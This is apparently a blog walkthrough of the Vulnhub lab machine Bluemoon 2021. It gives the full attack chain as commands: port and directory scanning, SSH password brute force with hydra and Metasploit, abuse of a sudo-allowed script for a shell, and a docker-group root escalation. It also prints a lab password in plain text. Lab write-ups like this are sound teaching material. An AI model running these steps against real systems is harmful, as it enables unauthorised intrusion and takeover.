NepCodeX

Byte Musings: Where Tech Meets Curiosity


Bluemoon 2021 Walkthrough – Vulnhub – Writeup

bluemoon 2021 walkthrough writeup vulnhub security

Welcome to the walkthrough/writeup of Bluemoon 2021 from Vulnhub. Here, I will explain all the necessary steps to boot the machine to root.

Link to the machine: https://www.vulnhub.com/entry/bluemoon-2021,679/

Walkthrough of Wayne Manor

Identify the target

Firstly, I had to identify the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24
image 350

Scan open ports

Then, I had to enumerate the open ports in order to identify the exposed services.

nmap -T4 -sC -sV -p- --min-rate=1000 10.0.2.25 -oN bluemoon.nmap
image 351

As you can see, ports 21 (ftp), 22 (ssh) and 80 (http) are open. Furthermore, I couldn’t access ftp anonymously. Hence, I decided to further enumerate the webserver.

Enumerate webserver

image 352

The website looks simple and there isn’t anything that would interest me right now. Hence, I decided to do directory enumeration.

gobuster dir -u http://10.0.2.25 -x php,txt,html --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o bluemoon.gobuster
image 353

Although it took a lot of time to complete the enumeration, I had a hidden_text path that would lead me to the next step of the exploit.

image 354

Here, we got a link which might be a QR code. Hence, I downloaded it and decoded it using zbar-tools. Also, I could have done it online, but I store findings on the directory that I create for a machine.

curl http://10.0.2.25/.QR_C0d3.png -O
zbarimg .QR_C0d3.png
image 355

Clearly, we got credentials for the ftp server.

Connecting to ftp server

ftp 10.0.2.25
get information.txt
get p_lists.txt
image 356

From the ftp server, we got two files to our local machine.

image 357
cat information.txt p_lists.txt

As we can see from above, there might be a user robin who has password from the file p_lists.txt. Previously, we also identified that SSH was open.

Bruteforce SSH

Now, we can bruteforce SSH for user robin with the help of the passwords’ list. Hence, I could use either hydra or msfconsole for this purpose.

By using metasploit framework:

msfconsole
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.0.2.25
set username robin
set pass_file p_lists.txt
set verbose true
run
image 358

A downside of this method is that, it can be a bit slower than hydra and it requires a lot of extra commands.

Using hydra:

hydra -l robin -P p_lists.txt 10.0.2.25 ssh
image 359

Here, we identfied the password of the user robin.

user: robin
pass: k4rv3ndh4nh4ck3r
image 360

Finally, we got the flag for the user robin. Then, I checked if there are other users in the machine and found there is one called jerry.

image 361

Switch to another user

Now, we have to switch to another user jerry. Earlier, we saw a directory called project in the home directory of robin.

cd project
cat feedback.sh
sudo -l
image 363

There is a script inside that would take feedbacks from a user. Furthermore, the feedback is also executed. Also, when I listed the sudo permissions of the user robin, I found that the user has permissions to run the feedback.sh script on jerry without requiring a password.

sudo -u jerry ./feedback.sh
image 364

When I provided the input /bin/bash, it gave me a shell as jerry. Then, I spawned a pty shell as follows.

python -c 'import pty;pty.spawn("/bin/bash")'

Finally, I got the flag for the user jerry.

cd
ls -al
cat user2.txt
image 365

Privilege escalation to root

When I listed the information of the user jerry, I found out that it belongs to the group docker. Then, I looked up on GTFOBins for the escalation command for the group.

Reference: https://gtfobins.github.io/gtfobins/docker/

id
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
image 366

It looked like I got the root shell of the target.

cd /root
ls -al
cat root.txt
image 367

Hence, we got the root flag.

Conclusion

Bluemoon 2021 is an easy machine from vulnhub. Thanks to its author Kirthik for the machine. Although this machine is quite simple, it’s a great machine to learn for a beginner user. Here, you get to learn about bruteforcing using hydra, exploiting sudo permissions and exploits relating to a user’s group. I hope you liked this walkthrough. Please, check my other writeups as well.



0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments